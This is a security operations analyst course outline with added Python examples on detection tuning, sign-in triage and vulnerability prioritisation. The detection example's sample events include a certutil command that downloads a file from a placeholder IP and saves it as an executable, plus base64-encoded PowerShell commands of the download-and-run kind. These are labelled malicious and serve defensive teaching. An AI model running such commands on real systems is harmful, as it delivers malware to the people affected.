A practical intermediate course for analysts who support monitoring, investigation, and response. Participants learn the analyst mindset, key data sources, detection and triage methods, incident workflows, and clear reporting practices across on-prem and cloud environments.
You will standardize how you collect signals, investigate alerts, and communicate findings. You will apply repeatable workflows for detection, incident response, identity and email threats, vulnerability triage, cloud telemetry, and stakeholder reporting.
After this training you will be confident in:
• Using common telemetry sources to investigate threats and reduce false positives
• Running structured triage and incident response with clear handoffs and timelines
• Applying detection engineering basics and threat hunting techniques
• Communicating findings with concise reports, metrics, and recommendations
Before attending you should have:
• Comfort with operating systems, basic networking, and the command line
• Familiarity with security concepts and at least one SIEM or log platform
• Access to a non-sensitive training tenant or sample datasets is helpful
*We know each team has its own needs and specifications, so we can modify the training outline to fit them.
Module 1: Analyst mindset and SOC workflows
• Roles, queues, SLAs, and handoffs across monitoring and response
• Alert lifecycle from creation to closure with evidence tracking
• Runbooks and decision trees that balance speed and accuracy
Module 2: Threat landscape and attacker techniques
• Mapping common threats to tactics, techniques, and procedures
• Prioritizing risks for your sector and tech stack
• Translating tactics into concrete detection opportunities
Module 3: Telemetry and logging essentials
• Endpoint, network, identity, and application logs and what each reveals
• Parsing events, timestamps, users, and assets for quick context
• Building a minimal evidence checklist per alert type
Module 4: SIEM investigations and alert quality
• Query building basics and pivot patterns
• Suppression, tuning, and deduplication to cut noise
• Triage notes that support later handoff and reporting
Module 5: Detection engineering fundamentals
• Hypothesis-driven detections and baseline creation
• Rule hygiene, versioning, and change reviews
• Measuring detection quality with precision and recall signals
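Added example for Modules 4 and 5 (this is illustration code, not course material): a simple "encoded PowerShell" rule is run over constructed process events that carry an analyst's ground-truth label, and precision and recall are measured before tuning, after a targeted suppression, and after an over-broad one. The hosts, users, command lines and labels are all made up for the example; the point is that a suppression must be checked against recall, not only against the drop in alert volume.

```python
# Added example (not part of the course materials). All events, field names and
# labels below are constructed for illustration.

# Constructed process-creation events plus the analyst's verdict on each.
EVENTS = [
    {"host": "ws-017",  "user": "jdoe",     "proc": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
     "label": "true_positive"},
    {"host": "ws-042",  "user": "mlee",     "proc": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwA=",
     "label": "true_positive"},
    {"host": "scan-01", "user": "svc_vuln", "proc": "powershell.exe",
     "cmdline": "powershell.exe -enc SQBuAHYAbwBrAGUALQBDAGgAZQBjAGsA",
     "label": "benign"},          # authorised vulnerability scanner
    {"host": "scan-01", "user": "svc_vuln", "proc": "powershell.exe",
     "cmdline": "powershell.exe -enc SQBuAHYAbwBrAGUALQBDAGgAZQBjAGsA",
     "label": "benign"},
    {"host": "ws-103",  "user": "rkim",     "proc": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\it\\inventory.ps1",
     "label": "benign"},
    {"host": "ws-088",  "user": "apatel",   "proc": "cmd.exe",
     "cmdline": "cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/a.txt a.exe",
     "label": "true_positive"},   # malicious, but outside what this rule looks for
    {"host": "ws-017",  "user": "jdoe",     "proc": "notepad.exe",
     "cmdline": "notepad.exe notes.txt", "label": "benign"},
]


def rule_encoded_powershell(e):
    """Hypothesis: PowerShell launched with an encoded command is worth a look."""
    return e["proc"].lower() == "powershell.exe" and " -enc" in e["cmdline"].lower()


def suppress_known_scanner(e):
    """Targeted tuning: the scanner's service account on the scanner host only."""
    return e["host"] == "scan-01" and e["user"] == "svc_vuln"


def suppress_over_broad(e):
    """Over-broad tuning: also silence jdoe because 'jdoe always runs scripts'."""
    return suppress_known_scanner(e) or e["user"] == "jdoe"


def evaluate(rule, events, suppress=None):
    """Count TP/FP/FN for a rule (optionally with a suppression) against labels."""
    tp = fp = fn = 0
    for e in events:
        fired = rule(e) and not (suppress is not None and suppress(e))
        is_bad = e["label"] == "true_positive"
        if fired and is_bad:
            tp += 1
        elif fired and not is_bad:
            fp += 1
        elif not fired and is_bad:
            fn += 1          # the rule never saw it: recall suffers, not precision
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return {"tp": tp, "fp": fp, "fn": fn,
            "precision": round(precision, 3), "recall": round(recall, 3)}


def compare_tuning(events=EVENTS):
    """Baseline vs. targeted vs. over-broad suppression, side by side."""
    return {
        "baseline":   evaluate(rule_encoded_powershell, events),
        "targeted":   evaluate(rule_encoded_powershell, events, suppress_known_scanner),
        "over_broad": evaluate(rule_encoded_powershell, events, suppress_over_broad),
    }


if __name__ == "__main__":
    for name, stats in compare_tuning().items():
        print(f"{name:10s} {stats}")
```

The targeted suppression raises precision from 0.5 to 1.0 without touching recall; the over-broad one also shows precision 1.0 but cuts recall in half, which is exactly the regression a change review on the rule should catch. The certutil event stays a false negative in every variant: a precision number alone would never reveal it, which is why hunts and labelled true positives from incidents feed back into rule coverage.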
Module 6: Incident response lifecycle
• Preparation, identification, containment, eradication, recovery
• Case structure, timelines, and evidence integrity
• Post-incident learning and action tracking
Module 7: Identity and access investigations
• Authentication flows, MFA, tokens, and common misuse patterns
• High-value signals from directory, SSO, and privilege changes
• Quick checks to separate benign anomalies from true abuse
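Added example for Modules 3 and 7 (illustration code, not course material): sign-in and directory events arrive with mixed timestamp formats (ISO-8601 with Z, ISO-8601 with an offset, epoch seconds) and are normalised to UTC before a quick check is applied. The check compares each sign-in against a per-user baseline of countries and devices and escalates only when a new location or device is followed within a short window by an MFA method registration or a privileged role assignment. The users, baselines, event names, window and field names are all assumptions made for this example.

```python
from datetime import datetime, timezone, timedelta

# Added example (not part of the course materials). Events, baselines, event names
# and the 30-minute window are constructed for illustration.

FOLLOW_ON_EVENTS = {"mfa_method_added", "privileged_role_assigned"}
WINDOW = timedelta(minutes=30)

# Constructed per-user baselines an analyst would normally derive from recent history.
BASELINES = {
    "jdoe":   {"countries": {"US"},       "devices": {"dev-1a"}},
    "mlee":   {"countries": {"US", "GB"}, "devices": {"dev-2b"}},
    "apatel": {"countries": {"US"},       "devices": {"dev-3c"}},
}

# Constructed events in three timestamp formats, deliberately out of order.
EVENTS = [
    {"ts": "2024-05-02T13:05:00Z",      "user": "jdoe",   "event": "signin", "country": "NG", "device": "dev-9f"},
    {"ts": "2024-05-02T08:00:00Z",      "user": "mlee",   "event": "signin", "country": "GB", "device": "dev-2b"},
    {"ts": 1714655400,                  "user": "jdoe",   "event": "mfa_method_added"},           # 13:10:00Z
    {"ts": "2024-05-02T10:00:00+01:00", "user": "mlee",   "event": "signin", "country": "FR", "device": "dev-2b"},
    {"ts": "2024-05-02T11:00:00Z",      "user": "apatel", "event": "signin", "country": "DE", "device": "dev-7x"},
    {"ts": "2024-05-02T15:20:00+02:00", "user": "jdoe",   "event": "privileged_role_assigned"},   # 13:20:00Z
    {"ts": "2024-05-02T12:00:00Z",      "user": "apatel", "event": "mfa_method_added"},           # 60 min later
]


def parse_ts(value):
    """Normalise epoch seconds or ISO-8601 (Z or offset) to an aware UTC datetime."""
    if isinstance(value, (int, float)):
        return datetime.fromtimestamp(value, tz=timezone.utc)
    dt = datetime.fromisoformat(str(value).replace("Z", "+00:00"))
    if dt.tzinfo is None:
        # A naive timestamp cannot be placed on a timeline; refuse rather than guess.
        raise ValueError(f"naive timestamp rejected: {value!r}")
    return dt.astimezone(timezone.utc)


def assess_signins(events, baselines, window=WINDOW):
    """Return a verdict per user whose sign-in deviated from baseline."""
    timeline = sorted(({**e, "ts": parse_ts(e["ts"])} for e in events), key=lambda e: e["ts"])
    verdicts = {}
    for i, e in enumerate(timeline):
        if e["event"] != "signin":
            continue
        base = baselines[e["user"]]
        new_country = e["country"] not in base["countries"]
        new_device = e["device"] not in base["devices"]
        if not (new_country or new_device):
            continue                                  # fully within baseline
        follow_on = [f["event"] for f in timeline[i + 1:]
                     if f["user"] == e["user"]
                     and f["event"] in FOLLOW_ON_EVENTS
                     and f["ts"] - e["ts"] <= window]
        if follow_on:
            verdict = "escalate"        # anomaly plus persistence/privilege change
        elif new_country and new_device:
            verdict = "review"          # both unfamiliar, nothing else yet: confirm with the user
        else:
            verdict = "likely_benign"   # known device, new place: consistent with travel
        verdicts[e["user"]] = {"at": e["ts"].isoformat(), "verdict": verdict,
                               "new_country": new_country, "new_device": new_device,
                               "follow_on": follow_on}
    return verdicts


if __name__ == "__main__":
    for user, v in assess_signins(EVENTS, BASELINES).items():
        print(user, v)
```

Sorting after normalisation matters: the raw feed above is out of order and mixes offsets, and a window check on unnormalised strings would silently miss jdoe's 15:20+02:00 role assignment. apatel's MFA change lands 60 minutes after the sign-in, outside the window, so the verdict is "review" rather than "escalate"; the window is a tuning knob that should be set from the tenant's own incident history.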
Module 8: Email and web threat handling
• Phishing patterns, payload types, and sandbox outcomes
• URL and attachment triage, user follow-ups, and takedown requests
• Blocking, allowlisting, and awareness feedback loops
Module 9: Cloud telemetry for analysts
• Core logs and findings across major providers
• Resource changes, access keys, and network paths that matter
• Practical guardrails for multi-account investigations
Module 10: Vulnerability and exposure management
• From scan results to risk-based prioritization
• CVSS with context, asset criticality, and exploit intel
• Patch windows, exceptions, and validation notes
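Added example for Module 10 (illustration code, not course material): constructed scan findings are ranked by a context-aware priority instead of CVSS base score alone, time-boxed risk exceptions are honoured, and each queued item gets a patch-by date from its tier. The weights, tier thresholds, patch windows, finding IDs and field names are assumptions chosen to make the point visible; a real program would calibrate them against its own asset inventory and exploit intelligence feeds.

```python
from datetime import date, timedelta

# Added example (not part of the course materials). Weights, tiers, SLAs, finding IDs
# and field names are assumptions for illustration only.

CRITICALITY_WEIGHT = {1: 0.6, 2: 0.8, 3: 1.0, 4: 1.2, 5: 1.4}   # 1 = lab box .. 5 = crown jewel
EXPLOIT_BONUS = 2.0      # public exploit or observed in-the-wild exploitation
EXPOSURE_BONUS = 1.5     # reachable from the internet
TIERS = [(12.0, "P1", 7), (9.0, "P2", 30), (6.0, "P3", 90)]  # (min score, tier, patch window days)
AS_OF = date(2024, 5, 2)  # constructed "today" for the exception check

# Constructed scan findings with the context a scanner alone does not give you.
FINDINGS = [
    {"id": "VULN-001", "cvss_base": 9.8, "asset_criticality": 2, "internet_exposed": False,
     "exploit_known": False, "exception_until": date(2024, 4, 1)},    # exception has expired
    {"id": "VULN-002", "cvss_base": 7.5, "asset_criticality": 5, "internet_exposed": True,
     "exploit_known": True,  "exception_until": None},
    {"id": "VULN-003", "cvss_base": 8.1, "asset_criticality": 3, "internet_exposed": False,
     "exploit_known": True,  "exception_until": None},
    {"id": "VULN-004", "cvss_base": 5.3, "asset_criticality": 4, "internet_exposed": True,
     "exploit_known": False, "exception_until": None},
    {"id": "VULN-005", "cvss_base": 7.2, "asset_criticality": 3, "internet_exposed": False,
     "exploit_known": True,  "exception_until": date(2024, 6, 30)},   # accepted risk, still valid
]


def priority_score(f):
    """CVSS base scaled by asset criticality, plus bonuses for exploit intel and exposure."""
    s = f["cvss_base"] * CRITICALITY_WEIGHT[f["asset_criticality"]]
    if f["exploit_known"]:
        s += EXPLOIT_BONUS
    if f["internet_exposed"]:
        s += EXPOSURE_BONUS
    return round(s, 2)


def tier_for(score):
    """Map a score to (tier, patch window in days); None means the next regular cycle."""
    for threshold, tier, days in TIERS:
        if score >= threshold:
            return tier, days
    return "P4", None


def prioritize(findings, today):
    """Split findings into a ranked work queue and a list of still-valid exceptions."""
    queue, excepted = [], []
    for f in findings:
        exc = f.get("exception_until")
        if exc is not None and exc >= today:
            # Accepted risk: keep it visible with its expiry so it is re-reviewed, not forgotten.
            excepted.append({"id": f["id"], "exception_until": exc.isoformat()})
            continue
        score = priority_score(f)
        tier, days = tier_for(score)
        queue.append({"id": f["id"], "score": score, "tier": tier,
                      "patch_by": (today + timedelta(days=days)).isoformat() if days else None})
    queue.sort(key=lambda r: r["score"], reverse=True)
    return {"queue": queue, "excepted": excepted}


if __name__ == "__main__":
    result = prioritize(FINDINGS, AS_OF)
    for row in result["queue"]:
        print(row)
    print("excepted:", result["excepted"])
```

The 9.8 on an isolated low-value host (VULN-001) ends up last in the queue, behind a 7.5 that is internet-facing, on a crown-jewel asset and has a known exploit (VULN-002). VULN-005 is held out of the queue while its exception is valid but returned with its expiry date, so the validation note for the exception has somewhere to live and the item resurfaces automatically once the date passes.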
Module 11: Threat intelligence and hunting
• Indicators vs behaviors and when to use each
• Enrichment sources, tagging, and simple scoring
• Lightweight hunts that convert into detections
Module 12: Reporting, metrics, and stakeholder communication
• Writing clear summaries, impact statements, and next actions
• Metrics that matter for leadership and operations
• Compliance-aware documentation and evidence retention basics
Hands-on learning for organizations, with expert instructors at your location.
Master new skills from anywhere, guided by experienced instructors.